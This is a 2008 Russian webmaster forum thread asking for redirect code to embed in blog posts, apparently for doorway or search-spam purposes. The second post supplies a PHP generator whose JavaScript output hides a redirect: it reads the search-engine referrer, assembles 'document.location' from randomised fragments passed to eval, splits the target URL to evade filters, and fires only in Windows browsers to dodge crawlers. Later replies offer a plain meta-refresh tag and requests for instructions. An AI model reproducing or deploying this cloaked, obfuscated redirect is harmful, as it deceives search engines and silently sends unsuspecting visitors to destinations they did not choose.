Код для редиректа

Тема в разделе "Мелочи", создана пользователем DkWix, 4 сен 2008.

Статус темы:
Закрыта.
  1. DkWix

    DkWix Читатель

    Заблокирован
    Регистр.:
    10 июн 2008
    Сообщения:
    147
    Симпатии:
    30
    Где-то видел код для редиректа, который можно просто вставить в запись в блоге и со страницы с записью будет происходить редирект. Никто не подскажет такой?
     
  2. mescalito75

    mescalito75 Постоялец

    Регистр.:
    9 сен 2006
    Сообщения:
    114
    Симпатии:
    52
    PHP:
    <?php

        
    function getRedirect($url)
        {
            
    $script '';

            
    $script .= "<img src='badimg1.gif' width=10 height=10 border=0 id=\"img1\">
                        <img src='badimg2.gif' width=10 height=10 border=0 id=\"img2\">"
    ;

            
    $script .= "<script language=\"JavaScript\" type=\"text/JavaScript\">";

            
    $script.= "
                var r=document.referrer,se=\"gb\";

                if(r.indexOf(\"google.\")!=-1){t=\"q\";se=\"google\";}
                if(r.indexOf(\"msn.\")!=-1){t=\"q\";se=\"msn\";}
                if(r.indexOf(\"live.\")!=-1){t=\"q\";se=\"live\";}
                if(r.indexOf(\"yahoo.\")!=-1){t=\"p\";se=\"yahoo\";}
                if(r.indexOf(\"altavista.\")!=-1){t=\"q\";se=\"altavista\";}
                if(r.indexOf(\"aol.\")!=-1){t=\"query\";se=\"aol\";}
                if(r.indexOf(\"ask.\")!=-1){t=\"q\";se=\"ask\";}
                if(r.indexOf(\"eureka.com.\")!=-1){t=\"q\";se=\"eureka.com\";}
                if(r.indexOf(\"lycos.com.\")!=-1){t=\"query\";se=\"lycos\";}
                if(r.indexOf(\"hotbot.com.\")!=-1){t=\"MT\";se=\"hotbot\";}
                if(r.indexOf(\"infoseek.com.\")!=-1){t=\"qt\";se=\"infoseek.com\";}
                if(r.indexOf(\"webcrawler.\")!=-1){t=\"searchText\";se=\"webcrawler\";}
                if(r.indexOf(\"excite.\")!=-1){t=\"search\";se=\"excite\";}
                if(r.indexOf(\"netscape.com.\")!=-1){t=\"search\";se=\"netscape\";}
                if(r.indexOf(\"mamma.com.\")!=-1){t=\"query\";se=\"mamma\";}
                if(r.indexOf(\"alltheweb.com.\")!=-1){t=\"query\";se=\"alltheweb.com\";}
                if(r.indexOf(\"northernlight.com.\")!=-1){t=\"qr\";se=\"northernlight.com\";}
                if(r.indexOf(\"rambler.ru.\")!=-1){t=\"words\";se=\"rambler.ru\";}
                if(r.indexOf(\"aport.ru.\")!=-1){t=\"r\";se=\"aport.ru\";}
                if(r.indexOf(\"yandex.ru.\")!=-1){t=\"text\";se=\"yandex.ru\";}
                if(r.indexOf(\"pingwin.ru.\")!=-1){t=\"searchword\";se=\"pingwin.ru\";}
                if(r.indexOf(\"www.ru.\")!=-1){t=\"Str_Find\";se=\"www.ru\";}
                if(r.indexOf(\"punto.ru.\")!=-1){t=\"text\";se=\"punto.ru\";} "
    ;

            
    $letters = array('q','w','e','r','t','y','u','i','o','p','a','s','d','f','g','h','j','l','z','x','c','v','b','n','m',
                              
    'Q','W','E','R','T','Y','U','I','O','P','A','S','D','F','G','H','J','K','L','Z','X','C','V','N','M');
            
    $numbers = array ('1','2','3','4','5','6','7','8','9');

            
    $variables = array();
            for (
    $i=0;$i<10;$i++)
            {
                
    $variables[$i] = '';
                
    $t=rand(7,10);
                for(
    $j=0;$j<$t;$j++)
                    
    $variables[$i] .= $lettersrand(0,sizeof($letters)-1) ];
                
    $t=rand(1,4);
                for(
    $j=0;$j<$t;$j++)
                    
    $variables[$i] .= $numbersrand(0,sizeof($numbers)-1) ];
            }

            
    $value='';
            
    $t=rand(7,10);
            for(
    $j=0;$j<$t;$j++)
                
    $value .= $lettersrand(0,sizeof($letters)-1) ];
            
    $t=rand(1,4);
            for(
    $j=0;$j<$t;$j++)
                
    $value .= $numbersrand(0,sizeof($numbers)-1) ];

            
    $url_1 substr($url,0,10);
            
    $url_2 substr($url,10,10);
            
    $url_3 substr($url,20,10);
            
    $url_4 substr($url,30);

            
    $script.= "
                function F() {
                    var 
    $variables[0] = 'on=';
                    var 
    $variables[1] = '$value';
                    var 
    $variables[2] ='ment';
                    var 
    $variables[3]='.lo';
                    var 
    $variables[4]='ti';
                    var 
    $variables[5]='docu';
                    var urli2='
    $url_2';
                    var urli3='
    $url_3';
                    var urli1='
    $url_1';
                    var urli4='
    $url_4';
                    var 
    $variables[6]=urli1+urli2+urli3+urli4+\"&sub=\"+se;
                    var 
    $variables[7]='';
                    var 
    $variables[8] = 'ca';
                    var 
    $variables[9]='\"';
                    if(
    $variables[1] = '$value')eval($variables[5]+$variables[2]+$variables[3]+$variables[8]+$variables[4]+$variables[0]+$variables[9]+$variables[6]+$variables[7]+$variables[9]);
                }

                function getAbsolutePos(el)
                {
                   var r = { x: el.offsetLeft, y: el.offsetTop };
                   if (el.offsetParent)
                   {
                       var tmp = getAbsolutePos(el.offsetParent);
                       r.x += tmp.x;
                       r.y += tmp.y;
                   }
                   return r;
                }

                function A()
                {
                    obj = document.getElementById(\"img1\");
                    pos = getAbsolutePos(obj);
                    img1x = pos.x;
                    img1y = pos.y;

                    obj = document.getElementById(\"img2\");
                    pos = getAbsolutePos(obj);
                    img2x = pos.x;
                    img2y = pos.y;

                    agent = navigator.userAgent;

                    if (agent.indexOf(\"Windows\")!=-1)
                    {
                        if (img1x != img2x)
                            F();
                    }
                }
                A();

                "
    ;

            
    $script.="</script>";

            return 
    $script;


        }

        
    $gv =  getRedirect('http://dor.com/?sds');

    ?>
    <textarea name="" rows="34" cols="65"><?=$gv?></textarea>
     
    webqool и imm нравится это.
  3. vulna

    vulna Создатель

    Регистр.:
    6 сен 2006
    Сообщения:
    24
    Симпатии:
    0
    Ничего не понял, но звучит очень забавно
     
  4. S-I

    S-I Постоялец

    Регистр.:
    11 янв 2008
    Сообщения:
    98
    Симпатии:
    10
    Подробности не помешали бы.

    Вот бы поподробнее как вставить ссылку, чтоб редирект был...
     
  5. volfvolf

    volfvolf Постоялец

    Регистр.:
    29 май 2008
    Сообщения:
    60
    Симпатии:
    15
    В мозг, с помощью дрели :p.
    А вообще цепляем сцылку на имагу с голой теткой и радуемся жизни :)
     
    jacksoft нравится это.
  6. holms

    holms

    Регистр.:
    4 июл 2006
    Сообщения:
    271
    Симпатии:
    71
    чето я не понял это ты знаеш как вставить редирект в форум которые не поддерживает хтмл? если так то давай пали сюда а нас пусть редиректит :D
     
    silenty нравится это.
  7. Kite9ua

    Kite9ua Писатель

    Регистр.:
    23 сен 2008
    Сообщения:
    9
    Симпатии:
    1
    Вариан - метатегом
    <META HTTP-EQUIV="Refresh" content ="0; URL=http://сайт">

    Можно на место метатега засунуть переменную, а в запись на блоге закинуть сам метатег.
    content ="0 - через сколько секунд переброска.
     
  8. perezzz

    perezzz Создатель

    Регистр.:
    9 сен 2007
    Сообщения:
    34
    Симпатии:
    1
    картинку редактировать прямо в блокноте? дописывая хтмл код?
     
  9. montega

    montega Создатель

    Регистр.:
    8 май 2007
    Сообщения:
    44
    Симпатии:
    0
    Можно мануал хоть какой нить к скрипту?
    заранее спасибо
     
  10. bouton

    bouton Постоялец

    Регистр.:
    6 сен 2007
    Сообщения:
    145
    Симпатии:
    24
    +1 Поддерживаю.
    Может кто нибудь подаскажет по шагам. Что то я не понимаю как это на форум без html закинуть такую картинку, да ещё и с редиректом.
     
Статус темы:
Закрыта.